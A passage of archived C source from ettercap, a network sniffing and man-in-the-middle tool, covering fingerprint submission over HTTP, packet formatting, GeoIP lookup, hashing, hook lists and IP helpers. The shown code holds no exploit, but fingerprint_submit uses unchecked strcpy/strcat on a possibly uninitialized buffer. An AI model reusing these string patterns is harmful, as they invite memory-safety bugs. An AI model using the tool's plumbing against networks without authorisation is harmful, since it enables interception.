c += i & 1; j <<= 1; } while ( i >>= 1 ); if ( c == 1 ) return x; else return ( j ? j : 0xff ); } /* * submit a fingerprint to the ettercap website * Example of php code to intercept the post */ int fingerprint_submit(char* host, char* page, const char *finger, const char *os) { char postparams[1024]; char *os_encoded; size_t i, os_enclen; char fullpage [ PAGE_LEN + 1 ]; char fullurl[HOST_LEN + PAGE_LEN + 2]; #ifdef HAVE_CURL CURL *curl; CURLcode res; #else int sock; #endif if (strlen(host) == 0) strcpy(host, DEFAULT_HOST); if (strlen(page) == 0) strcpy(page, DEFAULT_PAGE); if (page[0] != '/') strcpy(fullpage, "/"); strcat(fullpage, page); strcpy(fullurl, host); strcat(fullurl, fullpage); memset(postparams, 0, sizeof(postparams)); /* some sanity checks */ if (strlen(host) > HOST_LEN || strlen(fullpage) > PAGE_LEN || strlen(finger) > FINGER_LEN || strlen(os) > OS_LEN) return -E_INVALID; os_encoded = strdup(os); /* sanitize the os (encode the ' ' to '+') */ os_enclen = strlen(os_encoded); for (i = 0; i < os_enclen; i++) if (os_encoded[i] == ' ') os_encoded[i] = '+'; USER_MSG("Submitting the fingerprint to %s...\n", fullurl); #ifdef HAVE_CURL curl_global_init(CURL_GLOBAL_ALL); curl = curl_easy_init(); if (curl) { snprintf(postparams, sizeof(postparams), "finger=%s&os=%s", finger, os_encoded); SAFE_FREE(os_encoded); curl_easy_setopt(curl, CURLOPT_URL, fullurl); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postparams); res = curl_easy_perform(curl); DEBUG_MSG("Post request content is: %s\n", postparams); if (res != CURLE_OK) { USER_MSG("Failed to submit fingerprint: %s\n", curl_easy_strerror(res)); } else { USER_MSG("New fingerprint submitted to the remote website...\n"); } curl_easy_cleanup(curl); } curl_global_cleanup(); #else /* prepare the socket */ sock = open_socket(host, 80); switch(sock) { case -E_NOADDRESS: FATAL_MSG("Cannot resolve %s", host); break; case -E_FATAL: FATAL_MSG("Cannot create the socket"); break; case -E_TIMEOUT: FATAL_MSG("Connect timeout to %s on port 80", host); break; case -E_INVALID: FATAL_MSG("Error connecting to %s on port 80", host); break; } /* prepare the HTTP request */ snprintf(postparams, sizeof(postparams), "POST %s HTTP/1.1\r\n" "Host: %s\r\n" "Accept: */*\r\n" "User-Agent: %s (%s)\r\n" "Content-Length: %zu\r\n" "Content-Type: application/x-www-form-urlencoded \r\n\r\n" "finger=%s&os=%s\r\n" "\r\n", fullpage, host, EC_GBL_PROGRAM, EC_GBL_VERSION, 7 + strlen(finger) + 4 + strlen(os_encoded), finger, os_encoded ); SAFE_FREE(os_encoded); /* send the request to the server */ socket_send(sock, (const u_char*)postparams, strlen(postparams)); /* ignore the server response */ close_socket(sock); DEBUG_MSG("Post request content is: %s\n", postparams); USER_MSG("New fingerprint submitted to the remote website...\n"); #endif return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_format.c000664 000000 000000 00000023652 13711276346 016364 0ustar00rootroot000000 000000 /* ettercap -- formatting functions Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #ifdef HAVE_UTF8 #include #endif /* globals */ #ifdef HAVE_UTF8 static char *utf8_encoding; #endif static u_int8 EBCDIC_to_ASCII[256] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x2E, 0x2E, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x2E, 0x3F, 0x20, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x3C, 0x28, 0x2B, 0x7C, 0x26, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x21, 0x24, 0x2A, 0x29, 0x3B, 0x5E, 0x2D, 0x2F, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x7C, 0x2C, 0x25, 0x5F, 0x3E, 0x3F, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x3A, 0x23, 0x40, 0x27, 0x3D, 0x22, 0x2E, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x7E, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x2E, 0x2E, 0x2E, 0x5B, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x5D, 0x2E, 0x2E, 0x7B, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x7D, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x5C, 0x2E, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E, 0x2E }; /**********************************/ /* * parses the "format" and set the right visualization method */ int set_format(char *format) { DEBUG_MSG("set_format: %s", format); if (!strcasecmp(format, "hex")) { EC_GBL_FORMAT = &hex_format; return E_SUCCESS; } if (!strcasecmp(format, "ascii")) { EC_GBL_FORMAT = &ascii_format; return E_SUCCESS; } if (!strcasecmp(format, "text")) { EC_GBL_FORMAT = &text_format; return E_SUCCESS; } if (!strcasecmp(format, "html")) { EC_GBL_FORMAT = &html_format; return E_SUCCESS; } if (!strcasecmp(format, "ebcdic")) { EC_GBL_FORMAT = &ebcdic_format; return E_SUCCESS; } if (!strcasecmp(format, "utf8")) { EC_GBL_FORMAT = &utf8_format; return E_SUCCESS; } FATAL_MSG("Unsupported format (%s)", format); } /* * return the len of the resulting buffer (approximately) */ int hex_len(int len) { int i, nline; /* null string ? */ if (len == 0) return 1; /* calculate the number of lines (ceiling) */ nline = len / HEX_CHAR_PER_LINE; if (len % HEX_CHAR_PER_LINE) nline++; /* one line is printed as 66 chars */ i = nline * 66; return i; } /* * convert a buffer to a hex notation * * the string "HTTP/1.1 304 Not Modified" becomes: * * 0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74 HTTP/1.1 304 Not * 0010: 204d 6f64 6966 6965 64 Modified */ int hex_format(const u_char *buf, size_t len, u_char *dst) { u_int i, j, jm, c; int dim = 0; char tmp[10]; /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy((char*)dst, "", 1); return 0; } /* empty the string */ memset(dst, 0, hex_len(len)); for (i = 0; i < len; i += HEX_CHAR_PER_LINE) { dim += snprintf(tmp, 7, "%04x: ", i); strncat(dst, tmp, 7); jm = len - i; jm = jm > HEX_CHAR_PER_LINE ? HEX_CHAR_PER_LINE : jm; for (j = 0; j < jm; j++) { if ((j % 2) == 1) { dim += snprintf(tmp, 4, "%02x ", buf[i+j]); strncat(dst, tmp, 4); } else { dim += snprintf(tmp, 3, "%02x", buf[i+j]); strncat(dst, tmp, 3); } } for (; j < HEX_CHAR_PER_LINE; j++) { if ((j % 2) == 1) { strcat((char*)dst, " "); dim += 3; } else { strcat((char*)dst, " "); dim += 2; } } strcat((char*)dst, " "); dim++; for (j = 0; j < jm; j++) { c = buf[i+j]; c = isprint(c) ? c : '.'; dim += snprintf(tmp, 2, "%c" , c); strncat(dst, tmp, 2); } strcat((char*)dst, "\n"); dim++; } return dim; } /* * prints only "printable" characters, the * others are represented as '.' */ int ascii_format(const u_char *buf, size_t len, u_char *dst) { u_int i = 0; /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy((char*)dst, "", 1); return 0; } /* make the substitions */ for (i = 0; i < len; i++) { if ( isprint((int)buf[i]) || buf[i] == '\n' || buf[i] == '\t' ) dst[i] = buf[i]; else dst[i] = '.'; } return len; } /* * prints only printable chars, skip the others */ int text_format(const u_char *buf, size_t len, u_char *dst) { u_int i, j = 0; /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy((char*)dst, "", 1); return 0; } for (i = 0; i < len; i++) { /* * check for escape chars for ansi color. * \033[ is the escape char. */ if (buf[i] == 0x1b && buf[i+1] == 0x5b) { /* * find the first alpha char, * this is the end of the ansi sequence */ while( !isalpha((int)buf[i++]) && i < len ); } if ( isprint((int)buf[i]) || buf[i] == '\n' || buf[i] == '\t' ) dst[j++] = buf[i]; } return j; } /* * convert from ebcdic to ascii */ int ebcdic_format(const u_char *buf, size_t len, u_char *dst) { u_int i = 0; /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy((char*)dst, "", 1); return 0; } /* convert from ebcdic to ascii */ for(i = 0; i < len; i++) dst[i] = (char) EBCDIC_to_ASCII[(u_int8)buf[i]]; return ascii_format(dst, len, dst); } /* * strip ever string contained in <...> */ int html_format(const u_char *buf, size_t len, u_char *dst) { u_int i, j = 0; /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy((char*)dst, "", 1); return 0; } for (i = 0; i < len; i++) { /* if a tag is opened, skip till the end */ if (buf[i] == '<') { while( buf[i++] != '>' && i < len ); } if ( isprint((int)buf[i]) || buf[i] == '\n' || buf[i] == '\t' ) dst[j++] = buf[i]; } return j; } /* * return the buffer as is */ int bin_format(const u_char *buf, size_t len, u_char *dst) { /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy((char*)dst, "", 1); return 0; } /* copy the buffer */ memcpy(dst, buf, len); return len; } /* * return the void string */ int zero_format(const u_char *buf, size_t len, u_char *dst) { /* variable not used */ (void) buf; (void) len; strncpy((char*)dst, "", 1); return 0; } /* * convert from a specified encoding to utf8 */ int utf8_format(const u_char *buf, size_t len, u_char *dst) { #ifndef HAVE_UTF8 /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy(dst, "", 1); return 0; } /* copy the buffer */ memcpy(dst, buf, len); return len; #else iconv_t cd; #if defined (OS_BSD) || defined (OS_LINUX) || defined (OS_GNU) || defined (OS_DARWIN) char *inbuf; #else const char *inbuf; #endif char *outbuf; size_t inbytesleft, outbytesleft; /* some sanity checks */ if (len == 0 || buf == NULL) { strncpy((char*)dst, "", 1); return 0; } if (utf8_encoding == NULL) { ui_msg("You must set an encoding type before using UTF8.\n"); return 0; } inbuf = (char *)buf; inbytesleft = len; outbuf = (char *)dst; cd = iconv_open("UTF-8", utf8_encoding); iconv(cd, &inbuf, &inbytesleft, &outbuf, &outbytesleft); iconv_close(cd); return len; #endif } /* * set the encoding to use when converting to UTF-8 */ int set_utf8_encoding(u_char *fromcode) { #ifndef HAVE_UTF8 (void) fromcode; USER_MSG("UTF-8 support not compiled in.\n"); return E_SUCCESS; #else iconv_t cd; DEBUG_MSG("set_utf8_encoding: %s", fromcode); if (fromcode == NULL || strlen((const char*)fromcode) < 1) return -E_INVALID; SAFE_FREE(utf8_encoding); /* make sure encoding type is supported */ cd = iconv_open("UTF-8", (const char*)fromcode); if (cd == (iconv_t)(-1)) SEMIFATAL_ERROR("The conversion from %s to UTF-8 is not supported.", fromcode); iconv_close(cd); utf8_encoding = strdup((const char*)fromcode); return E_SUCCESS; #endif } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_geoip.c000664 000000 000000 00000012153 13711276346 016171 0ustar00rootroot000000 000000 /* ettercap -- GeoIP interface; IPv4/6 address to geolocation lookup. Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #ifdef HAVE_GEOIP #include static GeoIP *gi = NULL; #ifdef WITH_IPV6 static GeoIP *gi6 = NULL; #endif static void geoip_exit (void) { GeoIP_delete (gi); gi = NULL; #ifdef WITH_IPV6 GeoIP_delete(gi6); gi6 = NULL; #endif GeoIP_cleanup(); } void geoip_init (void) { char *gi_info; /* try to find and open it in the default location */ gi = GeoIP_open_type(GEOIP_COUNTRY_EDITION, GEOIP_MEMORY_CACHE); /* not found, fallback in the configuration file value */ if(!gi) { if (!EC_GBL_CONF->geoip_data_file) return; gi = GeoIP_open (EC_GBL_CONF->geoip_data_file, GEOIP_MEMORY_CACHE); if (!gi) { DEBUG_MSG ("geoip_init: %s not found.", EC_GBL_CONF->geoip_data_file); GeoIP_cleanup(); return; } } gi_info = GeoIP_database_info (gi); DEBUG_MSG ("geoip_init: Description: %s.", GeoIPDBDescription[GEOIP_COUNTRY_EDITION]); DEBUG_MSG ("geoip_init: Info: %s. Countries: %u", gi_info ? gi_info : "", GeoIP_num_countries()); atexit (geoip_exit); SAFE_FREE(gi_info); gi_info = NULL; #ifdef WITH_IPV6 /* try to find and open it in the default location */ gi6 = GeoIP_open_type(GEOIP_COUNTRY_EDITION_V6, GEOIP_MEMORY_CACHE); /* not found, fallback in the configuration file value */ if (!gi6) { if (!EC_GBL_CONF->geoip_data_file_v6) return; gi6 = GeoIP_open(EC_GBL_CONF->geoip_data_file_v6, GEOIP_MEMORY_CACHE); if (!gi6) { DEBUG_MSG("geoip_init: %s not found.\n", EC_GBL_CONF->geoip_data_file_v6); return; } } gi_info = GeoIP_database_info(gi6); DEBUG_MSG("geoip_init: Description: %s.", GeoIPDBDescription[GEOIP_COUNTRY_EDITION_V6]); DEBUG_MSG("geoip_init: Info: %s. Countries: %u", gi_info ? gi_info : "", GeoIP_num_countries()); SAFE_FREE(gi_info); gi_info = NULL; #endif } /* * returns the country code string for a given IP address ... * - the two letter country code from GeoIP database * - "00" if ip address is the default or undefined address * - "--" if ip address is not global * return NULL if GeoIP API isn't initialized properly */ const char* geoip_ccode_by_ip (struct ip_addr *ip) { int id; #ifdef WITH_IPV6 struct in6_addr geo_ip6; #endif char tmp[MAX_ASCII_ADDR_LEN]; /* 0.0.0.0 or :: */ if (ip_addr_is_zero(ip)) { return "00"; } /* only global IP addresses can have a location */ if (!ip_addr_is_global(ip)) { return "--"; } /* Determine country id by IP address */ switch (ntohs(ip->addr_type)) { case AF_INET: if (!gi) return NULL; id = GeoIP_id_by_ipnum(gi, ntohl(*ip->addr32)); break; #ifdef WITH_IPV6 case AF_INET6: if (!gi6) return NULL; ip_addr_cpy((u_char *)geo_ip6.s6_addr, ip); id = GeoIP_id_by_ipnum_v6(gi6, geo_ip6); break; #endif default: return NULL; } DEBUG_MSG("geoip_ccode_by_ip: GeoIP country code for ip %s: %s", ip_addr_ntoa(ip, tmp), GeoIP_code_by_id(id)); return GeoIP_code_by_id(id); } /* * returns the country name string for a given IP address * return NULL if GeoIP API isn't initialized properly */ const char* geoip_country_by_ip (struct ip_addr *ip) { int id; #ifdef WITH_IPV6 struct in6_addr geo_ip6; #endif char tmp[MAX_ASCII_ADDR_LEN]; /* 0.0.0.0 or :: */ if (ip_addr_is_zero(ip)) { return "No unique location"; } /* only global IP addresses can have a location */ if (!ip_addr_is_global(ip)) { return "No unique location"; } /* Determine country id by IP address */ switch (ntohs(ip->addr_type)) { case AF_INET: if (!gi) return NULL; id = GeoIP_id_by_ipnum(gi, ntohl(*ip->addr32)); break; #ifdef WITH_IPV6 case AF_INET6: if (!gi6) return NULL; ip_addr_cpy((u_char *)geo_ip6.s6_addr, ip); id = GeoIP_id_by_ipnum_v6(gi6, geo_ip6); break; #endif default: return NULL; } DEBUG_MSG("geoip_country_by_ip: GeoIP country name for ip %s: %s", ip_addr_ntoa(ip, tmp), GeoIP_name_by_id(id)); return GeoIP_name_by_id(id); } #endif /* HAVE_GEOIP */ ettercap-0.8.3.1/src/ec_globals.c000664 000000 000000 00000006256 13711276346 016520 0ustar00rootroot000000 000000 /* ettercap -- global variables handling module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #define EC_GBL_FREE(x) do{ if (x != NULL) { free(x); x = NULL; } }while(0) /* global vars */ struct ec_globals *ec_gbls; /* proto */ /*******************************************/ void ec_globals_alloc(void) { SAFE_CALLOC(ec_gbls, 1, sizeof(struct ec_globals)); SAFE_CALLOC(ec_gbls->conf, 1, sizeof(struct ec_conf)); SAFE_CALLOC(ec_gbls->options, 1, sizeof(struct ec_options)); SAFE_CALLOC(ec_gbls->stats, 1, sizeof(struct gbl_stats)); SAFE_CALLOC(ec_gbls->ui, 1, sizeof(struct ui_ops)); SAFE_CALLOC(ec_gbls->env, 1, sizeof(struct program_env)); SAFE_CALLOC(ec_gbls->pcap, 1, sizeof(struct pcap_env)); SAFE_CALLOC(ec_gbls->lnet, 1, sizeof(struct lnet_env)); SAFE_CALLOC(ec_gbls->iface, 1, sizeof(struct iface_env)); SAFE_CALLOC(ec_gbls->bridge, 1, sizeof(struct iface_env)); SAFE_CALLOC(ec_gbls->sm, 1, sizeof(struct sniffing_method)); SAFE_CALLOC(ec_gbls->t1, 1, sizeof(struct target_env)); SAFE_CALLOC(ec_gbls->t2, 1, sizeof(struct target_env)); SAFE_CALLOC(ec_gbls->wifi, 1, sizeof(struct wifi_env)); /* filter list entries are allocated as needed */ ec_gbls->filters = NULL; /* init the structures */ TAILQ_INIT(&EC_GBL_PROFILES); LIST_INIT(&EC_GBL_HOSTLIST); return; } void ec_globals_free(void) { EC_GBL_FREE(ec_gbls->pcap); EC_GBL_FREE(ec_gbls->lnet); EC_GBL_FREE(ec_gbls->iface); EC_GBL_FREE(ec_gbls->bridge); EC_GBL_FREE(ec_gbls->sm); EC_GBL_FREE(ec_gbls->filters); free_ip_list(ec_gbls->t1); EC_GBL_FREE(ec_gbls->t1); free_ip_list(ec_gbls->t2); EC_GBL_FREE(ec_gbls->t2); EC_GBL_FREE(ec_gbls->env->name); EC_GBL_FREE(ec_gbls->env->version); EC_GBL_FREE(ec_gbls->env->debug_file); EC_GBL_FREE(ec_gbls->env); free_plugin_list(ec_gbls->options->plugins); EC_GBL_FREE(ec_gbls->options->proto); EC_GBL_FREE(ec_gbls->options->pcapfile_in); EC_GBL_FREE(ec_gbls->options->pcapfile_out); EC_GBL_FREE(ec_gbls->options->iface); EC_GBL_FREE(ec_gbls->options->iface_bridge); EC_GBL_FREE(ec_gbls->options->target1); EC_GBL_FREE(ec_gbls->options->target2); EC_GBL_FREE(ec_gbls->stats); EC_GBL_FREE(ec_gbls->options); EC_GBL_FREE(ec_gbls->conf); /* destroy the list structure */ filter_clear(); EC_GBL_FREE(ec_gbls); return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_hash.c000664 000000 000000 00000006041 13711276346 016010 0ustar00rootroot000000 000000 /*** * * Fowler/Noll/Vo hash * * The basis of this hash algorithm was taken from an idea sent * as reviewer comments to the IEEE POSIX P1003.2 committee by: * * Phong Vo (http://www.research.att.com/info/kpv/) * Glenn Fowler (http://www.research.att.com/~gsf/) * * In a subsequent ballot round: * * Landon Curt Noll (http://www.isthe.com/chongo/) * * improved on their algorithm. Some people tried this hash * and found that it worked rather well. In an EMail message * to Landon, they named it the ``Fowler/Noll/Vo'' or FNV hash. * * FNV hashes are designed to be fast while maintaining a low * collision rate. The FNV speed allows one to quickly hash lots * of data while maintaining a reasonable collision rate. See: * * http://www.isthe.com/chongo/tech/comp/fnv/index.html * * for more details as well as other forms of the FNV hash. *** * * NOTE: The FNV-0 historic hash is not recommended. One should use * the FNV-1 hash instead. * * To use the 32 bit FNV-0 historic hash, pass FNV0_32_INIT as the * Fnv32_t hashval argument to fnv_32_buf() or fnv_32_str(). * * To use the recommended 32 bit FNV-1 hash, pass FNV1_32_INIT as the * Fnv32_t hashval argument to fnv_32_buf() or fnv_32_str(). * *** * * Please do not copyright this code. This code is in the public domain. * * LANDON CURT NOLL DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, * INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO * EVENT SHALL LANDON CURT NOLL BE LIABLE FOR ANY SPECIAL, INDIRECT OR * CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF * USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR * OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR * PERFORMANCE OF THIS SOFTWARE. * * By: * chongo /\oo/\ * http://www.isthe.com/chongo/ * * Share and Enjoy! :-) */ #include #include #define FNV_32_PRIME ((Fnv32_t)0x01000193) #define FNV_64_PRIME ((Fnv64_t)0x100000001b3ULL) Fnv32_t fnv_32(void *buf, size_t len) { unsigned char *bp = (unsigned char *)buf; /* start of buffer */ unsigned char *be = bp + len; /* beyond end of buffer */ Fnv32_t hval = FNV1_32_INIT; /* * FNV-1 hash each octet in the buffer */ while (bp < be) { /* multiply by the 32 bit FNV magic prime mod 2^64 */ hval *= FNV_32_PRIME; /* xor the bottom with the current octet */ hval ^= (Fnv32_t)*bp++; } /* return our new hash value */ return hval; } Fnv64_t fnv_64(void *buf, size_t len) { unsigned char *bp = (unsigned char *)buf; /* start of buffer */ unsigned char *be = bp + len; /* beyond end of buffer */ Fnv64_t hval = FNV1_64_INIT; /* * FNV-1 hash each octet of the buffer */ while (bp < be) { /* multiply by the 64 bit FNV magic prime mod 2^64 */ hval *= FNV_64_PRIME; /* xor the bottom with the current octet */ hval ^= (Fnv64_t)*bp++; } /* return our new hash value */ return hval; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_hook.c000664 000000 000000 00000007626 13711276346 016037 0ustar00rootroot000000 000000 /* ettercap -- hook points handling Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #ifdef HAVE_EC_LUA #include #endif #include struct hook_list { int point; void (*func)(struct packet_object *po); LIST_ENTRY (hook_list) next; }; /* global data */ /* the list for the HOOK_* */ static LIST_HEAD(, hook_list) hook_list_head; /* the list for the PACKET_* */ static LIST_HEAD(, hook_list) hook_pck_list_head; pthread_mutex_t hook_mutex = PTHREAD_MUTEX_INITIALIZER; #define HOOK_LOCK do{ pthread_mutex_lock(&hook_mutex); } while(0) #define HOOK_UNLOCK do{ pthread_mutex_unlock(&hook_mutex); } while(0) pthread_mutex_t hook_pck_mutex = PTHREAD_MUTEX_INITIALIZER; #define HOOK_PCK_LOCK do{ pthread_mutex_lock(&hook_pck_mutex); } while(0) #define HOOK_PCK_UNLOCK do{ pthread_mutex_unlock(&hook_pck_mutex); } while(0) /*******************************************/ /* execute the functions registered in that hook point */ void hook_point(int point, struct packet_object *po) { struct hook_list *current; /* the hook is for a HOOK_PACKET_* type */ if (point > HOOK_PACKET_BASE) { HOOK_PCK_LOCK; LIST_FOREACH(current, &hook_pck_list_head, next) if (current->point == point) current->func(po); HOOK_PCK_UNLOCK; } else { HOOK_LOCK; LIST_FOREACH(current, &hook_list_head, next) if (current->point == point) current->func(po); HOOK_UNLOCK; } #ifdef HAVE_EC_LUA ec_lua_dispatch_hooked_packet(point, po); #endif return; } /* add a function to an hook point */ void hook_add(int point, void (*func)(struct packet_object *po) ) { struct hook_list *newelem; SAFE_CALLOC(newelem, 1, sizeof(struct hook_list)); newelem->point = point; newelem->func = func; /* the hook is for a HOOK_PACKET_* type */ if (point > HOOK_PACKET_BASE) { HOOK_PCK_LOCK; LIST_INSERT_HEAD(&hook_pck_list_head, newelem, next); HOOK_PCK_UNLOCK; } else { HOOK_LOCK; LIST_INSERT_HEAD(&hook_list_head, newelem, next); HOOK_UNLOCK; } } /* remove a function from an hook point */ int hook_del(int point, void (*func)(struct packet_object *po) ) { struct hook_list *current; /* the hook is for a HOOK_PACKET_* type */ if (point > HOOK_PACKET_BASE) { HOOK_PCK_LOCK; LIST_FOREACH(current, &hook_pck_list_head, next) { if (current->point == point && current->func == func) { LIST_REMOVE(current, next); SAFE_FREE(current); HOOK_PCK_UNLOCK; DEBUG_MSG("hook_del -- %d [%p]", point, func); return E_SUCCESS; } } HOOK_PCK_UNLOCK; } else { HOOK_LOCK; LIST_FOREACH(current, &hook_list_head, next) { if (current->point == point && current->func == func) { LIST_REMOVE(current, next); SAFE_FREE(current); HOOK_UNLOCK; DEBUG_MSG("hook_del -- %d [%p]", point, func); return E_SUCCESS; } } HOOK_UNLOCK; } return -E_NOTFOUND; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/ec_inet.c000664 000000 000000 00000041557 13711276346 016037 0ustar00rootroot000000 000000 /* ettercap -- IP address management Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* prototypes */ static const char *inet_ntop4(const u_char *src, char *dst, size_t size); static const char *inet_ntop6(const u_char *src, char *dst, size_t size); /***********************************************************************/ /* * creates a structure from a buffer */ int ip_addr_init(struct ip_addr *sa, u_int16 type, u_char *addr) { /* the version of the IP packet */ sa->addr_type = htons(type); /* wipe the buffer */ memset(sa->addr, 0, MAX_IP_ADDR_LEN); switch (type) { case AF_INET: sa->addr_len = htons(IP_ADDR_LEN); break; case AF_INET6: sa->addr_len = htons(IP6_ADDR_LEN); break; default: /* wipe the struct */ memset(sa, 0, sizeof(struct ip_addr)); BUG("Invalid ip_addr type"); return -E_INVALID; } memcpy(&sa->addr, addr, ntohs(sa->addr_len)); return E_SUCCESS; }; /* * copy the address in a buffer */ int ip_addr_cpy(u_char *addr, struct ip_addr *sa) { memcpy(addr, &sa->addr, ntohs(sa->addr_len)); return E_SUCCESS; } /* * compare two ip_addr structure. */ int ip_addr_cmp(struct ip_addr *sa, struct ip_addr *sb) { if (!sa || !sb) return -E_INVALID; /* different type are incompatible */ if (sa->addr_type != sb->addr_type) return -E_INVALID; return memcmp(sa->addr, sb->addr, ntohs(sa->addr_len)); } /* * returns 0 if the ip address is IPv4 or IPv6 */ int ip_addr_null(struct ip_addr *sa) { if (ntohs(sa->addr_type) == AF_INET || ntohs(sa->addr_type) == AF_INET6) return 0; return 1; } /* * return true if an ip address is 0.0.0.0 or invalid */ int ip_addr_is_zero(struct ip_addr *sa) { switch (ntohs(sa->addr_type)) { case AF_INET: if (memcmp(sa->addr, "\x00\x00\x00\x00", IP_ADDR_LEN)) return 0; break; case AF_INET6: if (memcmp(sa->addr, "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00", IP6_ADDR_LEN)) return 0; break; }; return 1; } /* * generates a random link-local ip address * returns E_SUCCESS or -E_INVALID if address family is unkown */ int ip_addr_random(struct ip_addr* ip, u_int16 type) { /* generate a random 32-bit number */ srand(time(NULL)); u_int32 r = rand(); u_int32 h1 = r | 0x02000000; u_int32 h2 = ~r; switch (type) { case AF_INET: ip->addr_type = htons(type); ip->addr_len = IP_ADDR_LEN; memset(ip->addr, 0, IP_ADDR_LEN); memcpy(ip->addr, "\xa9\xfe", 2); /* 169.254/16 */ memcpy(ip->addr + 2, (u_char*)&r, 2); break; case AF_INET6: ip->addr_type = htons(type); ip->addr_len = IP6_ADDR_LEN; 